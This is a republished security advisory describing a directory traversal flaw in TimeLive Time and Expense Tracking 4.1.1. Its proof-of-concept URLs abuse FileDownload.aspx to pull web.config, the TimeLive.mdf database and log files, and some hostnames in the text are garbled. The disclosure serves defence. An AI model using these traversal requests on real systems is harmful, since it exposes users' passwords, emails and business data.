标题: TimeLive Time and Expense Tracking <= Multiple Vulnerabilities
缺陷类别: Directory Traversal / Remote Database Download / File Download / Source Code Disclosure
作者: Nathaniel Carew HdhCmsTest2cto测试数据
级别:高
下载 地址: http://HdhCmsTestlivetecs测试数据/Release/TimeLiveWebSetup.exe
平台: ASP.NET
版本 : 4.1.1
测试平台: Windows Server Standard 2003 SP 2 / IIS 6
致谢 : Peregrinus & shiznat
概述:
---------
When using the import/export feature for csv/project/quickbooks files under:
http://HdhCmsTest2cto测试数据 /TimeLive/AccountAdmin/AccountImportExport. asp x
You are able to modify the file download URL you are redirected too
and traverse directories to download the hosted files including the TimeLive database:
Proof of Concept:
-----------------
http://HdhCmsTest2cto测试数据 /TimeLive/Shared/FileDownload.aspx?FileName=..\web.config
http://HdhCmsTest2cto测试数据 /TimeLive/Shared/FileDownload.aspx?FileName=..\App_Data\TimeLive.mdf
http://HdhCmsTest2cto测试数据 /TimeLive/Shared/FileDownload.aspx?FileName=..\Log\TimeLive.log
Impact:
-------
Successful exploitation could allow an attacker to download the complete database of users information
including email addresses, usernames and passwords and associated timesheet and expense data along with
any files contained within the subfolder of wwwroot.
查看更多关于TimeLive Time and Expense Tracking 4.1.1多个缺陷及修复的详细内容...